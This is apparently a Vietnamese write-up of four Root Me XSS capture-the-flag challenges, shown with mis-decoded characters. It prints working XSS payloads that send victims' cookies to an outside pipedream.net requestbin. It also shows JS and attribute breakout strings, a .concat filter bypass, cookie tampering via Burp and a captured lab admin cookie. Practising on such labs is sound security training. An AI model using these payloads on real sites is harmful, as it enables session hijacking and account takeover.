Page cover

โœ๏ธ[Root me] Writeup XSS Challenge

XSS - Stored 1

Trong bร i nร y nร y basic, khi vร o chรบng ta sแบฝ thแบฅy interface nhฦฐ nร y:

Cรณ form ฤ‘iแปn Title vร  Mesage khi ฤ‘รณ chรบg ta hรฃy thแปญ gแปญi lรชn mแป™t ฤ‘oแบกn message nhฦฐ ngฦฐแปi dรนng bรฌnh thฦฐแปng, tiแบฟp ฤ‘รณ thแปญ chรจn ฤ‘oแบกn script: <script>alert(1)</script>

Khi ฤ‘รณ chรบng ta thแบฅy script nร y chรจn thร nh cรดng vร o span tag vร o payload thร nh cรดng tแปซ ฤ‘รณ chรบng ta thay alert() thร nh document.location="https://eoqnvkovg5mm73q.m.pipedream.net?c="+document.cookie

Chแป mแป™t phรบt sau cookie sแบฝ ฤ‘ฦฐแปฃc gแปญi vแป requestbin

XSS DOM Based โ€“ Introduction

Trong bร i nร y thรฌ khi vร o nรณ cho mแป™t input nhแบญp tแปซ 0 tแป›i 100, thแปญ nhแบญp 100 xem nรณ sแบฝ ra gรฌ:

Ctr+U ฤ‘แปƒ mแปŸ source code lรชn xem nhฦฐ nร o:

แปž ฤ‘รขy ta thแบฅy rแบฑng cรณ mแป™t biแบฟn lร  number vร  khi ta nhแบญp sแป‘ lร  biแบฟn number ฤ‘ฦฐแปฃc gรกn vร o:

ร tฦฐแปŸng bร i nร y thรฌ chรบng ta sแบฝ break out JS bแบฑng cรกch '; hoแบทc '-

';alert(1)// hoแบทc '-alert(1)//

Payload thร nh cรดng!!! Khi ฤ‘รณ ฤ‘oแบกn script nรณ sแบฝ nhฦฐ nร y:

Vแบญy nhฦฐ bร i trรชn chรบng ta lแบกi thay payload nhฦฐ nร y trรชn URL

http://my-url/number=%27%3Bdocument.location%3D%22https%3A%2F%2Feoqnvkovg5mm73q.m.pipedream.net%3Fc%3D%22%2Bdocument.cookie//

Vรฌ XSS lร  lแป— hแป•ng client side nรชn chรบng ta sแบฝ gแปญi nรณ tแปซ contact cho admin:

Khi ฤ‘รณ con bot sแบฝ leak cookie cแปงa admin vแป khi admin nhแบฅp vร o ฤ‘แปc:

Graphical user interface, text, application Description automatically generated

XSS Reflected

Bร i nร y nhรฌn qua thรฌ khรดng cรณ form ฤ‘แปƒ test XSS mร  ฤ‘แป bร i lร  Reflected XSS nรชn chรบng ta sแบฝ xem xรฉt แปŸ URL:

Graphical user

Nแบฟu chรบng ta thay ฤ‘แป•i p=sha1 thรฌ nรณ sแบฝ ra gรฌ:

Nรณ sแบฝ ra nhฦฐ nร y, tiแบฟp ฤ‘รณ mแปŸ source code kiแบฟm tra:

Thแบฅy rแบฑng p=sha1 lร  giรก trแป‹ cแปงa thuแป™c tรญnh href nhฦฐ vแบญy chรบng ta cแบงn suy nghฤฉa lร m sao ฤ‘แปƒ chรจn ฤ‘ฦฐแปฃc vร o ฤ‘รขy.

Dรนng thuแป™c tรญnh onmousover hoแบทc onclick ฤ‘แปƒ thรชm vร o thแบป <a> nhฦฐng nรชn nhแป› rแบฑng thฦฐแปng thรฌ admin sแบฝ khรดng nhแบฅp vร o link lแบก nรชn แปŸ ฤ‘รขy chรบng ta chแปn omouseover, khi ฤ‘รณ ฤ‘oแบกn gแบฏn shau p sแบฝ lร :

sha1' onmousemove='alert(1)

Khi ฤ‘รณ payload sแบฝ nhฦฐ nร y:

sha1' onmousemove='document.location="https://eoqnvkovg5mm73q.m.pipedream.net?c=".concat(document.cookie)

Nรชn nhแป› rแบฑng chรบng ta phแบฃi dรนng nแป‘i chuแป—i .concat trong JS vรฌ dแบฅu + ฤ‘รฃ bแป‹ filter ฤ‘i

Sau khi gแปญi vร  report cho admin thรฌ chรบng ta chแป mแป™t phรบt ฤ‘แปƒ con bot leak thรดng tin vร  gแปญi vแป requestbin

XSS - Stored 2

Interface khรก giแป‘ng vแป›i bร i Stored 1 nhฦฐng chแป‰ cรณ ฤ‘iแปu nรณ thรชm status

Bแบญt source code lรชn kiแปƒm tra thรฌ cรณ mแป™t class ฤ‘ฦฐแปฃc ฤ‘แบทt lร  invite

ร tฦฐแปŸng sแบฝ dรนng Burp suite ฤ‘แปƒ bแบฏt hร nh ฤ‘แป™ng:

Nhแบญn thแบฅy Cookie cรณ status:invite, vแบญy thรฌ chรบng ta hay thแปญ thay ฤ‘แป•i giรก trแป‹ status xem nhฦฐ nร o:

Khi ฤ‘รณ chรบng ta forward ฤ‘แปƒ trang web gแปญi lรชn sever vร  nhแบญn ra rแบฑng status ฤ‘รฃ thay ฤ‘แป•i

ร tฦฐแปŸng bรขy giแป lร  break out ฤ‘oแบกn souce code nร y:

แปž ฤ‘รขy payload lรบc ฤ‘รณ sแบฝ lร  "><img scr=1 onerror=alert(1) /> ("> ฤ‘แปƒ ฤ‘รณng thแบป i lแบกi)

Payload thร nh cรดng giแป chแป‰ cแบงn thay alert() thร nh document....vร  gแปญi nรณ lรชn, ฤ‘แปฃi mแป™t lรบc thรฌ ฤ‘ฦฐแปฃc trแบฃ vแป ADMIN_COOKIE nhฦฐ nร y<<<Lฦฐu รฝ: cรณ thแปƒ dรนng .concat ฤ‘แปƒ nแป‘i chuแป—i nแบฟu bแป‹ filter dแบฅu + >>

Lรบc ฤ‘แบงu mรฌnh nghฤฉa ฤ‘รขy lร  flag nhฦฐng khรดng ฤ‘รบng, thรฌ chแปฃt nhแบญn ra status nรณ lร  invite thรฌ mรฌnh cแบงn thay ฤ‘แป•i cookie vร  reload lแบกi trang:

Cookie: status=invite; ADMIN_COOKIE=SY2USDIH78TF3DFU78546TE7F

Cรกc phแบงn tiแบฟp theo sแบฝ ฤ‘ฦฐแปฃc cแบญp nhแบญt trong thแปi gian sแป›m nhแบฅt cแบฃm ฦกn cรกc bแบกn ฤ‘รฃ ฤ‘แปc bร i...

Last updated